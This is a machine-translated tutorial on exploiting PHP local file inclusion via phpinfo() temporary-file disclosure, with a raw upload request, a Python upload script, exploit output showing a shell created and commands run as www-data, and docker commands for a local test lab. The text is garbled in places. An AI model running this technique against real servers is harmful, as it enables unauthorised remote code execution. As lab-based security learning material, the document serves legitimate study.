Php local files contain vulnerability-related knowledge. on Wooyun, there was a related article. lfi with phpinfo was first proposed by Daniel abroad. you can refer to the following two articles. The principle of exploits is to use php post to upload files to generate temporary files. phpinfo () reads the path and name of the temporary files. a backdoor is generated by a local vulnerability.
This method is successfully tested locally. to facilitate learning and reduce learning costs, you have built a docker environment for easy testing. Place the built docker on a foreign VPS and use the script in the poc folder of the github project lfi_phpinfo to run locally. you can still use getshell. This method is feasible and does not have high network requirements.
Docker Hub Image Address: janes/lfi_phpinfo
Github Project address: lfi_phpinfo
The source code is stored in the code directory and can be reproduced using docker. the poc Directory stores scripts.
Paper:
Http://gynvael.coldwind.pl/download.php? F=PHP_LFI_rfc1867_temporary_files.pdf
Http://www.insomniasec.com/publications/LFI%20With%20PHPInfo%20Assistance.pdf
0x01 php UploadArbitrary php file to the serverPost request to upload filesTemporary files are generated. you can find the path and name of the temporary file on the phpinfo page.
When uploading any file in php post mode, the server will create a temporary file to save the file content.
In order to facilitate file transfer, a form-based HTML file transfer method is defined in the HTTP protocol.
To ensure that the attribute of the upload form is enctype = "multipart/form-data, you must use POST. see: php file-upload.post-method
The PHP engine processes requests such as enctype = "multipart/form-data" as follows:
The PHP engine first saves the file content to a temporary file and then performs the corresponding operations. The temporary file name is a php + random character.
In PHP, there is a super global variable $ _ FILES to save the information of the uploaded file, including the file name, type, temporary file name, error code, size
0x02 manually test phpinfo () to obtain the temporary file pathFile upload.html
#!html
Access upload.html in the browser and upload the file file.txt.
#!php
The following figure shows the POST information of the burp.
#!bashPOST /LFI_phpinfo/phpinfo.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://127.0.0.1/LFI_phpinfo/upload.htmlConnection: closeContent-Type: multipart/form-data; boundary=---------------------------11008921013555437861019615112Content-Length: 368-----------------------------11008921013555437861019615112Content-Disposition: form-data; name="file"; filename="file.txt"Content-Type: text/plain -----------------------------11008921013555437861019615112Content-Disposition: form-data; name="submit"Submit-----------------------------11008921013555437861019615112--
For browser access, phpinfo returns the following information:
#!php_REQUEST["submit"] Submit_POST["submit"] Submit_FILES["file"] Array ( [name] => file.txt [type] => text/plain [tmp_name] => /tmp/phpufdCHh [error] => 0 [size] => 33 )
Obtain the tmp_name path.
0x03 python script upload file#!pythonimport requestshost = '127.0.0.1'url = 'http://{ip}/LFI_phpinfo/phpinfo.php'.format(ip=host)file_ = '/var/www/LFI_phpinfo/file.txt'response = requests.post(url, files={"name": open(file_, 'rb')})print(response.text)
Partial return results
#!php_FILES["name"]Array( [name] => file.txt [type] => [tmp_name] => /tmp/php7EvBv3 [error] => 0 [size] => 33)
Get shell
#!bash$ python lfi_phpinfo.py 127.0.0.1LFI with phpinfo()==============================INFO:__main__:Getting initial offset ...INFO:__main__:found [tmp_name] at 67801INFO:__main__:Got it! Shell created in /tmp/gINFO:__main__:Wowo! \m/INFO:__main__:Shutting down...
Firefox access
#!bashhttp://127.0.0.1/LFI_phpinfo/lfi.php?load=/tmp/gc&f=iduid=33(www-data) gid=33(www-data) groups=33(www-data)
It indicates that getshell is successful and can be used freely later ~~
0x05 use docker to build the environmentThe basic usage of docker is not described here. you can google it on your own. Here we provide two ways to build an image source: use Dockerfile in github lfi_phpinfo to build it on your own, or use the image janes/lfi_phpinfo that I have built.
-- [Php 1 = "" 2 = "2 =" 2 = "2 =" 2 = "2 =" 2 = "language = ": 5.6-apache "\"] [/php]/php 5
Or
-- Janes/lfi_phpinfo
Obtain the source code of github lfi_phpinfo, switch to the web directory, and start building the environment for testing. Three running methods are provided here.
Method 1 run the test using php official source
#!bashdocker run --rm -v code/:/var/www/html -p 80:80 php:5.6-apache
Method 2 run the test using the built Image janes/lfi_phpinfo
#!bashdocker pull "janes/lfi_phpinfo"docker run --rm -p "80:80" janes/lfi_phpinfo
Method 3 use docker-compose
#!bash docker-compose up
Next, you can use the python script getshell.
#!bashpython lfi_phpinfo.py docker_host_ip0x06 conclusion
The process of using LFI with PHPInfo is not as smooth as the process of reading the article. during this period, you may encounter some environment-related problems, and it will take effort to solve these problems, this is the source that gave rise to my idea of using docker to build a test environment, hoping to provide a more convenient learning environment for those who love network security. Finally, I would like to thank the author of the article [LFI with PHPInfo local test process] for providing me with a lot of help in studying LFI with phpinfo.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
